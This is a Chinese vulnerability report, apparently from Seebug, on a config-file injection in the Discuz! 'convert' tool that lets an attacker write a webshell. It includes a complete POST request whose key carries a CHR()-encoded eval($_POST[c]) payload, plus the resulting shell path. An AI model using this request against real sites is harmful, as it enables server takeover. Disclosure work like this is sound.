### 简要描述: discuz!某自带工具,由于使用不当,可以造成webshell。 而且经过调查,使用者数量较大。 ### 详细说明: discuz! 安装包中会自带一个转换工具 convert 这个工具由于存在安全问题,可以拿shell 一般存在网站目录 convert 或 utility/convert 而且经过调查,使用数量还是很大的。 使用前题是data目录可写,这也是这个工具的使用前题。 分析: 文件: utility\convert\include\do_config.inc.php 中 保存配置,跟踪到save_config_file utility\convert\include\global.func.php 分析方法:getvars 和 buildarray等 可以看出,对key进行过滤只有 getvars 前面,但后面的key完全没有过滤。 在 GPC OFF 时可直接拿shell ON 时, if($level == 0) { $newline = str_pad(' CONFIG '.strtoupper($key).' ', 50, '-', STR_PAD_BOTH); $return .= "\r\n// $newline //\r\n"; } 首字母也写到文件中。我们只要把key 加上换行符,就能实现写shell 通过方法: POST /utility/convert/index.php?a=config&source=d7.2_x2.0 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Length: 199 Content-Type:...
### 简要描述: discuz!某自带工具,由于使用不当,可以造成webshell。 而且经过调查,使用者数量较大。 ### 详细说明: discuz! 安装包中会自带一个转换工具 convert 这个工具由于存在安全问题,可以拿shell 一般存在网站目录 convert 或 utility/convert 而且经过调查,使用数量还是很大的。 使用前题是data目录可写,这也是这个工具的使用前题。 分析: 文件: utility\convert\include\do_config.inc.php 中 保存配置,跟踪到save_config_file utility\convert\include\global.func.php 分析方法:getvars 和 buildarray等 可以看出,对key进行过滤只有 getvars 前面,但后面的key完全没有过滤。 在 GPC OFF 时可直接拿shell ON 时, if($level == 0) { $newline = str_pad(' CONFIG '.strtoupper($key).' ', 50, '-', STR_PAD_BOTH); $return .= "\r\n// $newline //\r\n"; } 首字母也写到文件中。我们只要把key 加上换行符,就能实现写shell 通过方法: POST /utility/convert/index.php?a=config&source=d7.2_x2.0 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Length: 199 Content-Type: application/x-www-form-urlencoded newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR (95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR (59));//]=aaaa&submit=yes 即可以写shell,shell地址 convert/data/config.inc.php ### 漏洞证明: [<img src="https://images.seebug.org/upload/201312/111422138f8f58b2ccd0b7a942cc739bfe9a5c50.jpg" alt="0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/111422138f8f58b2ccd0b7a942cc739bfe9a5c50.jpg) [<img src="https://images.seebug.org/upload/201312/111422269b1f0b90e6402c16b6b5835b3001468f.jpg" alt="-1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/111422269b1f0b90e6402c16b6b5835b3001468f.jpg)